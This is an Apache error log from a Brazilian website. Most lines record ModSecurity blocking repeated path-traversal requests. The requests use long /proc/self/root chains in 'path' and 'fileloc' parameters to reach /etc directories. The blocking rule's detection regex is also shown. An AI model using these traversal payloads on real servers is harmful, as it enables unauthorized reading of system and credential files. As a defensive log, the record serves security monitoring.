[Tue Mar 17 16:15:51.699479 2026] [:error] [pid 17965:tid 140411683178240] [client 74.7.241.31:53622] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmoZ6t8Nd0UC_OcbVHXMwAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:15:59.122383 2026] [proxy_fcgi:error] [pid 6296:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:52474] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:16:01.031271 2026] [:error] [pid 25048:tid 140411674785536] [client 74.7.241.31:54562] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmocXXXq9-mGshjHG3OnwAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:16:03.228104 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:41606] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmoc9Y0UrI5A3LftIwK4wAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:16:20.126095 2026] [proxy_fcgi:error] [pid 6296:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:53032] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:16:22.448062 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:41612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmohta6ubjKNq_cu4YV-gAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:16:37.585983 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:42990] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmoldY0UrI5A3LftIwK9QAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:16:41.125831 2026] [proxy_fcgi:error] [pid 9299:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53672] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:17:02.070271 2026] [proxy_fcgi:error] [pid 7004:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:54318] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:17:12.331314 2026] [:error] [pid 25836:tid 140411632822016] [client 74.7.241.31:48326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmot4h-PF_25v4hFRB4ywAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:17:14.701235 2026] [:error] [pid 6296:tid 140411565680384] [client 74.7.241.31:32836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmounIk7brgkOH-rIWZoAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:17:21.391115 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.241.31:32850] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmowda6ubjKNq_cu4YWCQAAA0g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 16:17:24.117802 2026] [proxy_fcgi:error] [pid 2598:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54978] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:17:26.360855 2026] [:error] [pid 25836:tid 140411624429312] [client 74.7.241.31:44996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmoxoh-PF_25v4hFRB40gAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:17:30.319785 2026] [:error] [pid 7004:tid 140411708356352] [client 74.7.241.31:59156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmoysU6Sx0TG1YjmQi8WgAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:17:45.073846 2026] [proxy_fcgi:error] [pid 29151:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:55466] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:18:06.152704 2026] [proxy_fcgi:error] [pid 18380:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:55744] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:18:28.158235 2026] [proxy_fcgi:error] [pid 7004:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:56082] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:18:42.720918 2026] [:error] [pid 18380:tid 140411632822016] [client 74.7.241.31:59172] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpEq4xEDsg_V3ESNZZNwAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:18:47.109689 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.243.128:52914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpFxj0p0SRWAqcjGGHbAAAAwo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 16:18:50.137944 2026] [proxy_fcgi:error] [pid 18380:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56414] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:18:55.038223 2026] [:error] [pid 7004:tid 140411599251200] [client 74.7.244.43:34758] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abmpH8U6Sx0TG1YjmQi8aAAAApE"]
[Tue Mar 17 16:18:55.637720 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.243.128:46262] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpHweiSKl8TjouI-Yl7gAAA9A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:03.355099 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:33356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpJ9a6ubjKNq_cu4YWXAAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 16:19:04.340059 2026] [:error] [pid 6296:tid 140411616036608] [client 74.7.241.31:50774] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpKHIk7brgkOH-rIWZzQAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:07.703648 2026] [:error] [pid 18380:tid 140411666392832] [client 74.7.241.31:37880] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpK64xEDsg_V3ESNZZPgAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:09.450014 2026] [:error] [pid 18380:tid 140411565680384] [client 74.7.241.31:33124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpLa4xEDsg_V3ESNZZQQAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:10.830918 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:33132] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpLta6ubjKNq_cu4YWXQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:11.034059 2026] [proxy_fcgi:error] [pid 6296:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56730] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 16:19:12.349151 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:33146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpMNY0UrI5A3LftIwLDwAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 16:19:14.107424 2026] [:error] [pid 17965:tid 140411624429312] [client 74.7.241.31:33154] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmpMqt8Nd0UC_OcbVHXWAAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
